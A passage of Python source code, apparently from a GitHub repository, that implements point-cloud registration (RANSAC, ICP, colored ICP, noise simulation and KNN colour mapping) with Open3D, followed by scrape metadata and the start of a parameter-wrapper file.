\\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header attributes.'\n \n target_color = np.asarray(target_color_df)\n assert (len(target_color.shape)==2 and target_color.shape[1]==1), 'Target colors file has incorrect dimensions. \\n Target colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n assert (target_color.dtype=='float64'), 'Target colors contain non-float values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n norm_colors_target = min_max_normalisation(target_color)\n self.update_target_color(target_color)\n self.update_norm_target_color(norm_colors_target)\n \n target_rgb, _ = colour_map(target_color,\"viridis\")\n target_pcd.points=o3d.utility.Vector3dVector(target_np)\n target_pcd.colors=o3d.utility.Vector3dVector(target_rgb)\n o3d.io.write_point_cloud(self.pos_path_target.split('.xls')[0] + '.pcd', target_pcd)\n self.update_target_pcd(target_pcd)\n filenames.append(self.pos_path_target.split('.xls')[0] + '.pcd')\n \n return source_pcd, target_pcd\n\n except XLRDError:\n \n \"\"\" Handling .csv files\"\"\"\n try:\n source_df = pd.read_csv(self.pos_path_source, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n target_df = pd.read_csv(self.pos_path_target, skiprows = self.pos_skiprows, usecols = self.pos_usecols, header = self.pos_header)\n source_color_df = pd.read_csv(self.color_path_source, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n target_color_df = pd.read_csv(self.color_path_target, skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n\n source_pcd = o3d.geometry.PointCloud() \n source_np = np.asarray(source_df)\n assert (len(source_np.shape)==2 and source_np.shape[1]==3), 'Source points file has incorrect dimensions. \\n Source points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n assert (source_np.dtype=='float64' or source_np.dtype == 'int64'), 'Source points contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header, pos_usecols attributes.'\n \n source_color = np.asarray(source_color_df)\n assert (len(source_color.shape)==2 and source_color.shape[1]==1), 'Source colors file has incorrect dimensions. 
\\n Source colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n                assert (source_color.dtype=='float64' or source_color.dtype == 'int64'), 'Source colors contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n                \n                norm_colors_source = min_max_normalisation(source_color)\n                self.update_source_color(source_color)\n                self.update_norm_source_color(norm_colors_source)\n                \n                source_rgb, _ = colour_map(source_color,\"viridis\")\n                source_pcd.points=o3d.utility.Vector3dVector(source_np)\n                source_pcd.colors=o3d.utility.Vector3dVector(source_rgb)\n                o3d.io.write_point_cloud(self.pos_path_source.split('.csv')[0] + '.pcd', source_pcd)\n                self.update_source_pcd(source_pcd)\n                filenames.append(self.pos_path_source.split('.csv')[0] + '.pcd')\n\n                target_pcd = o3d.geometry.PointCloud() \n                target_np = np.asarray(target_df)\n                assert (len(target_np.shape)==2 and target_np.shape[1]==3), 'Target points file has incorrect dimensions. \\n Target points file must be a 2-dimensional array with \"n\" rows and 3 columns'\n                assert (target_np.dtype=='float64' or target_np.dtype == \"int64\"), 'Target points contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering pos_skiprows, pos_header attributes.'\n                \n                target_color = np.asarray(target_color_df)\n                assert (len(target_color.shape)==2 and target_color.shape[1]==1), 'Target colors file has incorrect dimensions. \\n Target colors file must be a 2-dimensional array with \"n\" rows and 1 column'\n                assert (target_color.dtype=='float64' or target_color.dtype == \"int64\"), 'Target colors contain non-float or int values. \\n This could mean column headings have been read incorrectly from file. Try altering color_skiprows, color_header, color_usecols attributes.'\n                norm_colors_target = min_max_normalisation(target_color)\n                self.update_target_color(target_color)\n                self.update_norm_target_color(norm_colors_target)\n                \n                target_rgb, _ = colour_map(target_color,\"viridis\")\n                target_pcd.points=o3d.utility.Vector3dVector(target_np)\n                target_pcd.colors=o3d.utility.Vector3dVector(target_rgb)\n                o3d.io.write_point_cloud(self.pos_path_target.split('.csv')[0] + '.pcd', target_pcd)\n                self.update_target_pcd(target_pcd)\n                filenames.append(self.pos_path_target.split('.csv')[0] + '.pcd')\n                \n                return source_pcd, target_pcd\n\n            except ValueError as v:\n                \n                print(\"Input excel files should be of extension .xls or .csv, with UTF-8 encoding. Please convert both files to either one of these formats.\")\n                print(v)\n        \n        finally:\n            if print_filenames:\n                print(filenames)\n    \n    \n    def preprocessing_func(self, verbose = True):\n        \n        \"\"\" Down sample the point cloud, estimate normals, then compute a FPFH feature for each point.
\n        Returns the processed PointCloud object and an open3d.registration.Feature class object.\"\"\"\n\n        source_pcd, target_pcd = self.create_pcd() \n\n        if self.downsampling:\n            source_processed = source_pcd.voxel_down_sample(self.voxel_size)\n            target_processed = target_pcd.voxel_down_sample(self.voxel_size)\n\n            if verbose:\n                print(f\":: Downsample with a voxel size {self.voxel_size}\")\n        else:\n            source_processed = source_pcd\n            target_processed = target_pcd\n\n            if verbose:\n                print(\":: Point Cloud was not downsampled\")\n\n        radius_normal = self.voxel_size * self.norm_radius_modifier\n        radius_feature = self.voxel_size * self.fpfh_radius_modifier\n\n        if verbose:\n            print(f\":: Estimate normal with search radius {radius_normal}.\")\n            print(f\":: Compute FPFH feature with search radius {radius_feature}.\\n---------------------------------------\")\n\n        source_processed.estimate_normals(\n            search_param = \n            o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=self.norm_maxnn),\n            fast_normal_computation = True)\n\n        source_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n            source_processed,\n            o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=self.fpfh_maxnn))\n\n        target_processed.estimate_normals(\n            search_param = \n            o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=self.norm_maxnn),\n            fast_normal_computation = True)\n\n        target_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n            target_processed,\n            o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=self.fpfh_maxnn))\n        \n        self.preprocessing_status_update()\n        \n        return source_processed, target_processed, source_fpfh, target_fpfh\n    \n    def global_ransac_registration(self, verbose = True):\n        \"\"\" Implements the RANSAC registration based on feature matching and returns a registration.RegistrationResult object.\n\n        Source: Adapted from open3d global registration documentation: http://www.open3d.org/docs/release/tutorial/pipelines/global_registration.html\n\n        Parameters:\n        ----------\n        source_processed: geometry.PointCloud\n            Source point cloud after downsampling (if downsample=True) and normal estimation\n        target_processed: geometry.PointCloud\n            Target point cloud after downsampling (if downsample=True) and normal estimation\n        source_fpfh: registration.Feature\n            Source point cloud fpfh information\n        target_fpfh: registration.Feature\n            Target point cloud fpfh information\n        voxel_size: float, optional\n            Multiplied with the ransac_dist_modifier to yield the distance threshold used by CorrespondenceCheckerBasedOnDistance\n        ransac_dist_modifier:float, optional\n            Multiplied with the voxel_size to yield the distance threshold used by CorrespondenceCheckerBasedOnDistance\n        ransac_edge_length: float, optional\n            Input to CorrespondenceCheckerBasedOnEdgeLength\n\n        Return:\n        ----------\n        result: registration.RegistrationResult\n            Result of RANSAC alignment\n        \"\"\"\n\n        distance_threshold = self.voxel_size * self.ransac_dist_modifier\n\n        if verbose:\n            print(\":: RANSAC registration on point clouds.\")\n            print(\"   Since the voxel size is %.3f,\" % self.voxel_size)\n            print(\"   we use a liberal distance threshold %.3f.\" % distance_threshold)\n        \n        source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n        result_ransac = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n            source_processed, target_processed, source_fpfh, target_fpfh, self.ransac_mutual_filter, distance_threshold,\n
o3d.pipelines.registration.TransformationEstimationPointToPoint(False), 4, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(self.ransac_edge_length),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(4000000, 500))\n \n self.registration_result_update(result_ransac)\n self.result_status_update()\n self.calculate_mae()\n \n return result_ransac\n \n def icp_registration(self, verbose = True): \n \"\"\" Implements the Point-to-Plane ICP registration algorithm and returns a registration.RegistrationResult object.\n \"\"\"\n\n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n distance_threshold = self.voxel_size * self.icp_dist_check\n\n result_icp = o3d.pipelines.registration.registration_icp(\n source_processed, target_processed, distance_threshold, ransac_transform.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPlane(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration = 2000))\n \n\n self.registration_result_update(result_icp)\n self.result_status_update()\n self.calculate_mae()\n \n return result_icp\n\n\n def colored_icp(self, verbose = True):\n \"\"\" Implements the Colored ICP registration algorithm and returns a registration.RegistrationResult object.\n\n Source: Adapted from open3d ICP registration documentation:http://www.open3d.org/docs/release/tutorial/pipelines/colored_pointcloud_registration.html\n \"\"\"\n \n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n current_transformation = ransac_transform.transformation\n\n source_colorreg = copy.deepcopy(source_processed)\n target_colorreg = copy.deepcopy(target_processed)\n\n if self.downsampling:\n source_colorreg = source_colorreg.voxel_down_sample(self.voxel_size)\n target_colorreg = target_colorreg.voxel_down_sample(self.voxel_size)\n\n source_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n target_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n result_icp_colored = o3d.pipelines.registration.registration_colored_icp(\n source_colorreg, target_colorreg, self.voxel_size, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=100))\n\n current_transformation = result_icp_colored.transformation\n \n self.registration_result_update(result_icp_colored)\n self.result_status_update()\n self.calculate_mae()\n\n return result_icp_colored\n \n def perform_registration(self, verbose = True):\n if self.algorithm == \"ransac\":\n return self.global_ransac_registration(verbose = verbose)\n \n elif self.algorithm == \"icp\":\n return self.icp_registration(verbose = verbose)\n\n elif self.algorithm == \"colored_icp\":\n return self.colored_icp(verbose = verbose)\n \n else:\n print(\"Only 'ransac', 'icp' and 'colored_icp' are available algorithms to choose from.\")\n return None\n \n def calculate_mae(self):\n \"\"\"Returns the mean absolute error between the source and target color intensity channels\n\n 
Parameters:\n ----------\n source_color: np.array\n Source color channel (raw) intensity values\n target_color: np.array\n Target color channel (raw) intensity values\n registration_result: registration.RegistrationResult\n Registration result of alignment\n\n Return:\n ---------\n mae: float\n Mean absolute error \n \"\"\"\n corr_result = np.array(self.registration_result.correspondence_set)\n source_indices = corr_result[:,0]\n target_indices = corr_result[:,1]\n source_color_norm = self.norm_source_color[source_indices]\n target_color_norm = self.norm_target_color[target_indices]\n \n self.update_mae(mae(source_color_norm, target_color_norm)[0])\n \n def obtain_registration_metrics(self):\n \"\"\" For a particular registration result, displays the fitness, inlier RMSE and MAE estimate. Also describes the correspondence \n map properties. \n\n Parameters:\n ----------\n target: geometry.PointCloud\n Target point cloud\n source_color: np.array\n Source color channel (raw) intensity values\n target_color: np.array\n Target color channel (raw) intensity values\n registration_result: registration.RegistrationResult\n Registration result of alignment\n \"\"\"\n\n print(\"--- Registration results --- \")\n print(f\"Fitness: {self.registration_result.fitness*100:.2f}%\")\n print(f\"Inlier RMSE: {self.registration_result.inlier_rmse:.2f}\")\n print(f\"MAE: {self.mae:.2f}\\n---------------------------------------\") \n\n corr_map = np.array(self.registration_result.correspondence_set)\n source_indices = corr_map[:,0]\n target_indices = corr_map[:,1]\n\n num_target = np.array(self.target_pcd.points).shape[0]\n target_range = np.arange(0, num_target)\n\n unmapped_targets =np.where(np.invert(np.in1d(target_range, target_indices)))[0]\n target_repeats = {i:list(target_indices).count(i) for i in target_indices if list(target_indices).count(i) > 1}\n unique_target_indices = [x for x in target_indices if x not in target_repeats]\n\n print(\"--- Correspondence map properties --- \")\n print(f\"{len(unmapped_targets)} ({(len(unmapped_targets)/ num_target)*100:.3f}%) unmapped targets.\")\n print(f\"{len(target_repeats)} ({(len(target_repeats)/ num_target)*100:.3f}%) targets that are mapped by multiple source points.\")\n print(f\"{len(unique_target_indices)} ({(len(unique_target_indices)/ num_target)*100:.3f}%) targets that are uniquely mapped by a single source point.\")\n\n if len(unmapped_targets) + len(target_repeats) + len(unique_target_indices) == len(self.target_pcd.points):\n print(f\"All {len(self.target_pcd.points)} target points are accounted for.\")\n \n def transform_source(self):\n transformation = self.registration_result.transformation\n source_transformed= copy.deepcopy(self.source_pcd)\n source_transformed.transform(transformation)\n return source_transformed\n\n def map_source2target(self, verbose = False):\n \"\"\" Returns the registered target point cloud, where the color intensity values of multiply mapped target points are imputed by\n a chosen averaging method. 
Currently, unmapped points in the target cloud retain their original intensities.\n\n        Parameters:\n        ----------\n        source: geometry.PointCloud\n            Source point cloud\n        target: geometry.PointCloud\n            Target point cloud\n        source_color: np.array\n            Source color channel intensity values\n        target_color: np.array\n            Target color channel intensity values\n        registration_result: registration.RegistrationResult\n            Registration result of alignment\n        method: str\n            A choice between \"mean\" or \"median\" averaging for imputing the intensity of multiply mapped target points\n        verbose: boolean\n            Prints the color numpy arrays before and after the mapping is performed.\n\n        Return:\n        --------\n        target_new: geometry.PointCloud\n            Updated target point cloud\n        mapped_col_range: matplotlib.cm.ScalarMappable object \n        color_list: np.array\n            Updated color intensity array of the target\n\n        \"\"\"\n        if self.manual_corr_map is not None:\n            corr_map = self.manual_corr_map\n        else:\n            corr_map = np.array(self.registration_result.correspondence_set)\n        \n        source_indices = corr_map[:,0]\n        target_indices = corr_map[:,1]\n        \n        target_new = copy.deepcopy(self.target_pcd)\n        \n        target_repeats = {i:list(target_indices).count(i) for i in target_indices if list(target_indices).count(i) > 1}\n        unique_target_indices = [x for x in target_indices if x not in target_repeats]\n        \n        if self.mode == \"complete\":\n            color_list = copy.deepcopy(self.target_color)\n        \n        elif self.mode == \"null\" or self.mode == \"knn\":\n            color_list = np.zeros(shape=(self.target_color.shape))\n        \n        \n        ### Dealing with all other color channels\n        \n        if self.other_source_channels:\n            other_registered_channels = []\n            \n            for i in range(len(self.other_source_channels)):\n                print(f\"{i} - Processing Other Source and Target channels\")\n                try:\n                    source_other_color = pd.read_excel(self.other_source_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n                \n                except XLRDError:\n                \n                    \"\"\" Handling .csv files\"\"\"\n                    source_other_color = pd.read_csv(self.other_source_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n                \n                source_color_list = np.asarray(source_other_color)\n                \n                if self.mode == \"knn\":\n                    source_transformed = self.transform_source()\n                    X = np.asarray(source_transformed.points)\n                    y = source_color_list\n                    knn = neighbors.KNeighborsRegressor(self.n_neighbors, weights= self.weights)\n                    target_color_list = knn.fit(X, y).predict(np.asarray(target_new.points))\n                    print(target_color_list)\n                    other_registered_channels.append(target_color_list)\n                    continue \n                \n                elif self.mode == \"complete\":\n                    try:\n                        target_other_color = pd.read_excel(self.other_target_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n                    \n                    except: \n                        target_other_color = pd.read_csv(self.other_target_channels[i], skiprows = self.color_skiprows, usecols = self.color_usecols, header = self.color_header)\n                    \n                    target_color_list = np.asarray(target_other_color)\n                \n                elif self.mode == \"null\":\n                    target_color_list = np.zeros(shape=(self.target_color.shape))\n                \n                \n                if self.method == \"median\" or self.method == \"Median\": \n                    print(\"Using median averaging\")\n                    for ind in target_repeats:\n                        bool_mask = target_indices == ind\n                        source_indices_repeat = source_indices[bool_mask]\n                        target_color_list[ind] = np.median(source_color_list[source_indices_repeat])\n\n                    for ind in unique_target_indices:\n                        bool_mask = target_indices == ind\n                        source_indices_unique = source_indices[bool_mask]\n
target_color_list[ind] = source_color_list[source_indices_unique]\n\n elif self.method == \"mean\" or self.method == \"Mean\" or self.method == \"average\" or self.method == \"Average\":\n print(\"Using mean averaging\")\n \n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n target_color_list[ind] = np.mean(source_color_list[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n target_color_list[ind] = source_color_list[source_indices_unique]\n \n other_registered_channels.append(target_color_list)\n \n self.update_other_registered_channels(other_registered_channels)\n \n ### Dealing with the color channel used for registration \n \n if self.mode == \"knn\":\n source_transformed = self.transform_source()\n X = np.asarray(source_transformed.points)\n y = self.source_color\n knn = neighbors.KNeighborsRegressor(self.n_neighbors, weights= self.weights)\n color_list = knn.fit(X, y).predict(np.asarray(target_new.points))\n \n else:\n if self.method == \"median\" or self.method == \"Median\": \n print(\"Using median averaging\")\n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n color_list[ind] = np.median(self.source_color[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n color_list[ind] = self.source_color[source_indices_unique]\n\n elif self.method == \"mean\" or self.method == \"Mean\" or self.method == \"average\" or self.method == \"Average\":\n print(\"Using mean averaging\")\n for ind in target_repeats:\n bool_mask = target_indices == ind\n source_indices_repeat = source_indices[bool_mask]\n color_list[ind] = np.mean(self.source_color[source_indices_repeat])\n\n for ind in unique_target_indices:\n bool_mask = target_indices == ind\n source_indices_unique = source_indices[bool_mask]\n color_list[ind] = self.source_color[source_indices_unique]\n else:\n raise Exception(\"Unrecognised method used. 
Only mean/average or median functions are permitted.\") \n\n if verbose:\n print(\"before assignment\", np.array(target_new.colors))\n\n mapped_rgb, mapped_col_range=colour_map(color_list,\"viridis\")\n\n target_new.colors =o3d.utility.Vector3dVector(mapped_rgb)\n \n self.update_registered_color(color_list)\n self.update_registered_target(target_new)\n\n if verbose:\n print(\"after assignment\", np.array(target_new.colors))\n print(np.all([mapped_rgb, np.array(target_new.colors)]))\n\n return (target_new,mapped_col_range, color_list)\n \nclass RegistrationObj_noisy(RegistrationObj):\n \n def __init__(self, pos_path_source, pos_path_target, color_path_source, color_path_target, \n algorithm = \"colored_icp\",**kwargs):\n super().__init__(pos_path_source, pos_path_target, color_path_source, color_path_target, **kwargs)\n self.noisy_registrationObj = []\n self.noisy_pcd_list = []\n self.noisy_pcd_temp = o3d.geometry.PointCloud()\n \n def update_noisy_pcd_list(self, noisy_pcd_list):\n self.noisy_pcd_list = noisy_pcd_list\n \n def update_noisy_registrationObj(self, noisy_registrationObj):\n self.noisy_registrationObj = noisy_registrationObj\n \n def global_ransac_registration(self, verbose = True):\n\n distance_threshold = self.voxel_size * self.ransac_dist_modifier\n\n if verbose:\n print(\":: RANSAC registration on point clouds.\")\n print(\" Since the voxel size is %.3f,\" % self.voxel_size)\n print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n result_ransac = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n self.noisy_pcd_temp, target_processed, source_fpfh, target_fpfh, self.ransac_mutual_filter, distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False), 4, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(self.ransac_edge_length),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(4000000, 500))\n\n self.registration_result_update(result_ransac)\n print(self.registration_result)\n self.result_status_update()\n\n return result_ransac\n\n def icp_registration(self, verbose = True): \n \"\"\" Implements the Point-to-Plane ICP registration algorithm and returns a registration.RegistrationResult object.\n \"\"\"\n\n ransac_transform = self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n distance_threshold = self.voxel_size * self.icp_dist_check\n\n result_icp = o3d.pipelines.registration.registration_icp(\n self.noisy_pcd_temp, target_processed, distance_threshold, ransac_transform.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPlane(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration = 2000))\n \n\n self.registration_result_update(result_icp)\n self.result_status_update()\n self.calculate_mae()\n \n return result_icp\n\n\n def colored_icp(self, verbose = True):\n \"\"\" Implements the Colored ICP registration algorithm and returns a registration.RegistrationResult object.\n\n Source: Adapted from open3d ICP registration documentation:http://www.open3d.org/docs/release/tutorial/pipelines/colored_pointcloud_registration.html\n \"\"\"\n print(\"Entering into colored_ICP\")\n ransac_transform = 
self.global_ransac_registration(verbose = verbose)\n \n source_processed, target_processed, source_fpfh, target_fpfh = self.preprocessing_func(verbose = verbose)\n\n current_transformation = ransac_transform.transformation\n\n source_colorreg = copy.deepcopy(self.noisy_pcd_temp)\n target_colorreg = copy.deepcopy(target_processed)\n\n if self.downsampling:\n source_colorreg = source_colorreg.voxel_down_sample(self.voxel_size)\n target_colorreg = target_colorreg.voxel_down_sample(self.voxel_size)\n\n source_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n target_colorreg.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=self.voxel_size * 2, max_nn=self.coloredICP_maxnn))\n\n result_icp_colored = o3d.pipelines.registration.registration_colored_icp(\n source_colorreg, target_colorreg, self.voxel_size, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=100))\n\n current_transformation = result_icp_colored.transformation\n \n self.registration_result_update(result_icp_colored)\n self.result_status_update()\n self.calculate_mae()\n\n return result_icp_colored\n \n def simulate_noise(self, sd_range = 50, sd_interval = 3, sim_num = 2, ax = None, legend = True,\n title = None, x_label = \"Noise (standard deviation)\", y_label = \"Metric results\",\n results_only = False, verbose = False):\n \n self.create_pcd()\n\n \"\"\" Noise simulation\"\"\"\n noise_sd = np.linspace(0,sd_range,sd_interval)\n len_noise = len(noise_sd)\n size_data = np.asarray(self.source_pcd.points).shape\n\n noisy_pcd_list = []\n results_list = []\n noisy_registrationObj = []\n\n for j in range(sim_num):\n np.random.seed(j)\n print(f\"----------Simulation num: {j+1}----------\")\n for i in range(len_noise):\n source_pcd = copy.deepcopy(self.source_pcd)\n noise = np.random.normal(0,noise_sd[i],size_data)\n combined_noise = np.asarray(source_pcd.points) + noise\n self.noisy_pcd_temp.points=o3d.utility.Vector3dVector(np.asarray(combined_noise))\n \n noisy_pcd_temp = copy.deepcopy(self.noisy_pcd_temp)\n noisy_pcd_list.append(noisy_pcd_temp)\n myRegObj = self.perform_registration(verbose = verbose)\n MyRegObjCopy =copy.deepcopy(myRegObj)\n noisy_registrationObj.append(MyRegObjCopy)\n\n results_list.append([self.registration_result.fitness, self.registration_result.inlier_rmse, \n (self.registration_result.inlier_rmse)/(self.registration_result.fitness), \n self.mae, (self.mae)/(self.registration_result.fitness), np.asarray(self.registration_result.correspondence_set).shape[0]])\n\n self.update_noisy_pcd_list(noisy_pcd_list)\n self.update_noisy_registrationObj(noisy_registrationObj)\n result_array = np.array(results_list)\n result = np.reshape(result_array, (sim_num,sd_interval,6))\n result_mean = np.mean(result, axis = 0)\n\n fitness = [mylist[0] for mylist in result_mean]\n inlier_rmse = [mylist[1] for mylist in result_mean]\n scaled_inlier_rmse = [mylist[2] for mylist in result_mean]\n mae = [mylist[3] for mylist in result_mean]\n scaled_inlier_mae = [mylist[4] for mylist in result_mean]\n corr_num = [mylist[5] for mylist in result_mean]\n\n\n if results_only:\n return np.asarray([fitness, inlier_rmse, scaled_inlier_rmse, mae, scaled_inlier_mae, corr_num])\n\n else:\n \"\"\" Plotting\"\"\"\n\n if ax is None:\n ax = plt.gca()\n ax.plot(noise_sd, fitness, label='Fitness')\n 
ax.plot(noise_sd, inlier_rmse, label='Inlier RMSE')\n ax.plot(noise_sd, mae, label='MAE')\n\n if legend:\n ax.legend(loc = \"upper left\")\n\n if title:\n ax.set_title(label = title)\n\n if x_label:\n ax.set_xlabel(x_label)\n\n if y_label:\n ax.set_ylabel(y_label)\n\n return ax\n\nclass IterativePairwise():\n \n def __init__(self, pos_path_source_list, pos_path_target, color_path_source_list, color_path_target, \n algorithm = \"colored_icp\", **kwargs):\n \n self.pos_path_source_list= pos_path_source_list\n self.pos_path_target = pos_path_target\n self.source_pcd = []\n self.target_pcd = None\n self.color_path_source_list = color_path_source_list\n self.color_path_target = color_path_target\n self.algorithm = algorithm\n self.source_length = len(self.pos_path_source_list)\n self.combined_results = []\n self.registered_color = None\n self.registration_obj = []\n self.other_registered_channels = []\n self.mode = \"knn\"\n self.method = \"Median\"\n self.n_neighbors = kwargs.get('n_neighbors', 5)\n self.weights = kwargs.get('weights', \"distance\")\n \n \"\"\"Setting the arguments for RegistrationObj.create_pcd\"\"\"\n self.pos_skiprows = None\n self.pos_usecols = None\n self.pos_header = 0\n self.color_skiprows = None\n self.color_usecols = None\n self.color_header = 0\n \n self.__dict__.update(kwargs)\n \n self.other_source_channels = kwargs.get('other_source_channels', [])\n self.other_target_channels = kwargs.get('other_target_channels', [])\n \n def __str__(self):\n string = \"\"\"--- Iterative Pairwise Object--- \\nAlgorithm used = {0}\\nSource file names : {1}\\nNumber of source files : {2}\\nTarget file name: {3}\"\"\". format(self.algorithm, self.pos_path_source_list, self.source_length, self.pos_path_target) \n return string\n \n def __repr__(self):\n return self.__str__()\n \n def __getitem__(self, i):\n return self.combined_results[i]\n \n def update_combined_results(self, combined_results):\n self.combined_results = combined_results\n \n def update_registration_obj(self, registration_obj):\n self.registration_obj = registration_obj\n \n def update_registered_color(self, registered_color):\n self.registered_color = registered_color\n \n def update_other_registered_channels(self, other_registered_channels):\n self.other_registered_channels = other_registered_channels\n \n def update_source_pcd(self, source_pcd):\n self.source_pcd = source_pcd\n \n def update_target_pcd(self, target_pcd):\n self.target_pcd = target_pcd\n \n def iterative_registration(self, jupyter_visualise = True, verbose = True):\n assert (self.source_length == len(self.color_path_source_list)), \"Length of source positions list is different from the source color intensities list.\"\n assert (type(self.pos_path_target) == str), \"Target position path should be a string.\" \n \n result_color_list = []\n result_list = []\n source_pcd = []\n registration_obj = []\n other_registration_channels = []\n \n for i in range(self.source_length):\n print(f\"--- Registering Source dataset {i}\")\n if not len(self.other_source_channels):\n print(f\"--No other source channels detected\")\n myObj = RegistrationObj(self.pos_path_source_list[i], self.pos_path_target, \n self.color_path_source_list[i], self.color_path_target, algorithm = \"colored_icp\",\n pos_skiprows = self.pos_skiprows, pos_usecols = self.pos_usecols, \n color_skiprows = self.color_skiprows, color_usecols = self.color_usecols,\n mode = self.mode, method = self.method, n_neighbors = self.n_neighbors, \n weights = self.weights)\n myObj.perform_registration(verbose 
= verbose)\n target_new, _, color_list = myObj.map_source2target()\n result_color_list.append(color_list)\n other_registration_channels.append(myObj.other_registered_channels)\n result_list.append([myObj.registration_result.fitness, myObj.registration_result.inlier_rmse,\n (myObj.registration_result.inlier_rmse/myObj.registration_result.fitness), myObj.mae])\n source_pcd.append(myObj.source_pcd)\n registration_obj.append(myObj.registration_result)\n else:\n myObj = RegistrationObj(self.pos_path_source_list[i], self.pos_path_target, \n self.color_path_source_list[i], self.color_path_target, algorithm = \"colored_icp\",\n pos_skiprows = self.pos_skiprows, pos_usecols = self.pos_usecols, \n color_skiprows = self.color_skiprows, color_usecols = self.color_usecols,\n other_source_channels = self.other_source_channels[i],\n other_target_channels = self.other_target_channels,\n mode = self.mode, method = self.method, n_neighbors = self.n_neighbors, \n weights = self.weights)\n myObj.perform_registration(verbose = verbose)\n target_new, _, color_list = myObj.map_source2target()\n result_color_list.append(color_list)\n other_registration_channels.append(myObj.other_registered_channels)\n result_list.append([myObj.registration_result.fitness, myObj.registration_result.inlier_rmse,\n (myObj.registration_result.inlier_rmse/myObj.registration_result.fitness), myObj.mae])\n source_pcd.append(myObj.source_pcd)\n registration_obj.append(myObj.registration_result)\n \n \n self.update_combined_results(result_list)\n self.update_source_pcd(source_pcd)\n self.update_target_pcd(myObj.target_pcd)\n self.update_registration_obj(registration_obj)\n \n result_color_list = np.asarray(result_color_list)\n color_median = np.median(result_color_list, axis = 0)\n self.update_registered_color(color_median)\n \n other_registration_channels = np.asarray(other_registration_channels)\n other_color_median = np.median(other_registration_channels, axis = 0)\n self.update_other_registered_channels(other_color_median)\n \n image_rgb_final, _ = colour_map(color_median,\"viridis\")\n target_final = copy.deepcopy(myObj.target_pcd)\n target_final.colors=o3d.utility.Vector3dVector(image_rgb_final)\n \n if jupyter_visualise:\n visualizer = JVisualizer()\n visualizer.add_geometry(target_final)\n visualizer.show()\n \n return target_final\n \n \n","repo_name":"kane9530/ZebReg","sub_path":"RegistrationObj.py","file_name":"RegistrationObj.py","file_ext":"py","file_size_in_byte":49426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5283125845","text":"import argparse\nimport numpy as np\n\n##############################################################################################################\n\nclass PARAM_WRAPPER():\n\t\"\"\"\n\tManages all params for the myclasses and others. \n\tinput_params(): loads the params from argparse\n\tdefault_params(class_name): returns the default params for the class\n\tget_params(class_name): return the current params for the class\n\n\treturns variable, error_msg\n\tif error_msg is None, task completed succesfully. 
